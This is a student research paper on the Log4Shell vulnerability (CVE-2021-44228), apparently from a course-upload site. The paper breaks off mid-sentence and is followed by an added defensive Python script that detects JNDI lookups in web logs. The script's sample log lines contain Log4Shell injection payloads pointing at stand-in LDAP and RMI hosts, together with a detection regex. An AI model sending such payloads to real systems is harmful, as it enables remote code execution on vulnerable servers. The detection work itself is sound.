A4 Brendyn Hitt

School

Bellevue University

Course

CIS311

Subject

Information Systems

Date

Oct 30, 2023

Pages

6

Uploaded by PrivateHummingbird3765

CVE-2021-44228 Apache Log4j2 (Log4Shell)

Brendyn T Hitt
Bellevue University
CIS311-T302 Network Security
Professor Nyburg
9/24/23

CVE-2021-44228 Apache Log4j2 (Log4Shell)

A vulnerability is a defect or weakness in software or hardware that can be exploited to breach availability, confidentiality, or integrity. This research paper covers what vulnerabilities are and details CVE-2021-44228, a vulnerability coming from Apache Corporation that had the potential to exploit billions of devices (Log4j – Apache Log4j Security Vulnerabilities. (2022). Logging.apache.org). Log4j is a popular logging tool used by Java enthusiasts, and this zero-day exploit had major implications.

Technical Mechanism and Features

Log4Shell is a vulnerability exploited by injection into the Java Naming and Directory Interface (JNDI), and its purpose is to give an attacker remote code execution (RCE). Log4j writes log messages, which record whenever a client registers or connects with a new request. An attacker could take advantage of this to attain RCE over a device and essentially gain the ability to control it (Apache Log4j Vulnerability Guidance | CISA. (2021). Cybersecurity and Infrastructure Security Agency CISA). By gaining the ability to modify log messages through a third-party application, an attacker could inject an infected log message into the Java Naming and Directory Interface, infecting the device and gaining RCE.

Goal of Exploit
The goal of Log4Shell was simply to gain remote code execution, which allowed hackers to do many things with a client's device. Denial of service (DoS) is a very common goal of gaining access to other devices: a hacker could crash the infected system by overloading and exhausting its resources, or use infected devices to flood a target with requests until it can no longer accept regular network traffic or data. Sensitive data can also be retrieved with relative ease from an infected device; this could be any sort of data, such as banking details, a Social Security number, or current location. With remote code execution, a device could unknowingly become infected with crypto-mining malware that burns the device's resources in excess, potentially causing hardware failure. Ransomware is possibly the most dangerous result of this vulnerability, as hackers could "lock" users out of their devices until they are paid.

Risk/Damage Potential

The damage potential of this vulnerability was astronomical: up to three billion devices that used Log4j were affected, and even the FDA released a statement, as the functionality of electronic medical devices had the potential to be impacted or compromised because of this (Health, C. for D. and R. (2023). Cybersecurity. FDA). Any device with insecure open-source code that is connected to the infected device also has the potential to be infected. The amount of personal and sensitive data that may have been compromised because of this is devastating. This exploit was discovered on
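
For the log-message mechanism described under Technical Mechanism and Features, the following is an added example (not part of the original paper) of how a defender can triage web access logs for JNDI lookup tokens. The `${jndi:...}` form is Log4j's lookup notation, which the paper does not quote; the log format, sample lines, and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# ${jndi:<scheme>://<host>...} with scheme and host captured for triage.
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):/{0,2}(?P<host>[^/}:\s]+)",
                     re.IGNORECASE)
CLIENT_RE = re.compile(r"^(?P<client>\S+) ")

# Constructed sample lines (documentation IP ranges, .invalid hosts).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2022:09:14:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2022:09:14:05 +0000] "GET / HTTP/1.1" 200 128 "-" "${jndi:ldap://cb.example.invalid/a}"
203.0.113.9 - - [01/Jan/2022:09:14:06 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fcb2.example.invalid%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"
192.0.2.44 - - [01/Jan/2022:09:15:40 +0000] "GET /docs/jndi-overview HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def find_jndi_lookups(log_text):
    """Return one finding per log line that contains a JNDI lookup token."""
    findings = []
    for lineno, raw in enumerate(log_text.splitlines(), start=1):
        decoded = unquote(raw)  # query strings are logged percent-encoded
        match = JNDI_RE.search(decoded)
        if not match:
            continue  # e.g. a URL that merely contains the word "jndi"
        client = CLIENT_RE.match(raw)
        findings.append({
            "line": lineno,
            "client": client.group("client") if client else None,
            "scheme": match.group("scheme").lower(),
            "host": match.group("host").lower(),  # host the lookup pointed at
        })
    return findings


def summarize(findings):
    """Count findings per client address so responders can prioritise sources."""
    return Counter(f["client"] for f in findings)


if __name__ == "__main__":
    hits = find_jndi_lookups(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(dict(summarize(hits)))
```

A hit shows that a lookup string reached the log, not that the host was compromised; the extracted hosts are what to search for in outbound connection records.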